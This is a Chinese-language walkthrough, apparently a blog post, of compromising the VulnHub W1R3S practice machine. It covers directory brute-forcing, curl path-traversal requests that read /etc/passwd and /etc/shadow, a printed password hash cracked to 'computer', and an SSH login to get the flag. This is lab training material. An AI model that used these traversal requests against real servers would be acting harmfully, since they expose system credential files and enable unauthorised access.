2021年1月2日-VulnHub-W1R3S 渗透学习

VulnHub-W1R3S 渗透学习

靶机下载地址:https://www.vulnhub.com/entry/w1r3s-101,220/

kali地址:192.168.31.77

靶机IP地址:192.168.31.11

一、信息收集

image-20210101234605239

image-20210101235026322

image-20210101235128950

使用dirb 爆破目录

image-20210101235909523

image-20210102000003741

image-20210102000242350

image-20210102000302760

image-20210102000908898

curl是一个命令行工具,可用于在网络上传输数据。

它支持许多现成的协议,包括HTTP,HTTPS,FTP,FTPS,SFTP,IMAP,SMTP,POP3等。

在调试网络请求时,curl是您可以找到的最佳工具之一。

curl使用 教程 https://flaviocopes.com/http-curl/

curl -s --data-urlencode urlConfig=../../../../../../../../../etc/passwd http://192.168.31.11/administrator/alerts/alertConfigField.php

image-20210102001433135

image-20210102001454423

然后我再次执行以下命令,使用相同的过程获取密码文件。

curl -s --data-urlencode urlConfig=../../../../../../../../../etc/shadow http://192.168.31.11/administrator/alerts/alertConfigField.php

image-20210102001740816

w1r3s:$6$xe/eyoTx$gttdIYrxrstpJP97hWqttvc5cGzDNyMb0vSuppux4f2CcBv3FwOt2P1GFLjZdNqjwRuP3eUjkgb/io7x9q1iP.:17567:0:99999:7:::

复制到一个 pass.txt 文本文件中

image-20210102010625799

得到w1r3s 的密码computer

使用 ssh登录

image-20210102010814344

获得flag.txt

image-20210102011022210

获得flag.txt

这个靶机还是比较简单的

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值